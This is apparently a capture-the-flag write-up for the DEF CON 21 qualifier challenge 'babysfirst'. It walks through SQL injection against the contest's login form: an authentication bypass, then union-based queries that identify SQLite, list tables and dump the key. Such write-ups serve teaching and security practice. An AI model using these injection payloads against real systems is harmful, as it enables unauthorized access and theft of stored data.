DC21 quals # 3dub 02 – babysfirst

URL: http://babysfirst.shallweplayaga.me:8041
Type: SQL injection
Solution: literally online lolling on line WucGesJi
 


02.babyfirst


Let’s inspect HTTP headers setting username with admin and empty password :

POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

username=admin&password=
--------------------------------------------------------------------
HTTP/1.1 403 Forbidden
Date: Mon, 17 Jun 2013 15:54:46 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' limit 1;
Content-Type: text/html; charset=utf-8

Result is forbidden, but X-Sql: header gives us the queried SQL statement! Let’s try a basic SQL injection:

POST /login HTTP/1.1
Host: babysfirst.shallweplayaga.me
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

username=admin&password='+or+'1
--------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2013 15:58:29 GMT
Transfer-Encoding: chunked
X-Sql: select name from users where name = 'admin' and password = '' or '1' limit 1;
Content-Type: text/html; charset=utf-8

    success!
    logged in as root

So it’s vulnerable but we have to found the key…

  1. First i thought it was the root password but it doesn’t work:
    username=admin&password=' union select password from users --
    -> logged in as barking up the wrong tree
  2. So i tried to find which SQL engine was used. I got a successful hit with sqlite:
    username=admin&password=' union select sqlite_version() --
    -> logged in as 3.7.9
  3. We can then list all the tables:
    username=admin&password=' union all select name from sqlite_master --
    -> logged in as keys
    and then display keys table:
    username=admin&password=' union all select * from keys --
    -> logged in as The key is: literally online lolling on line WucGesJi

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *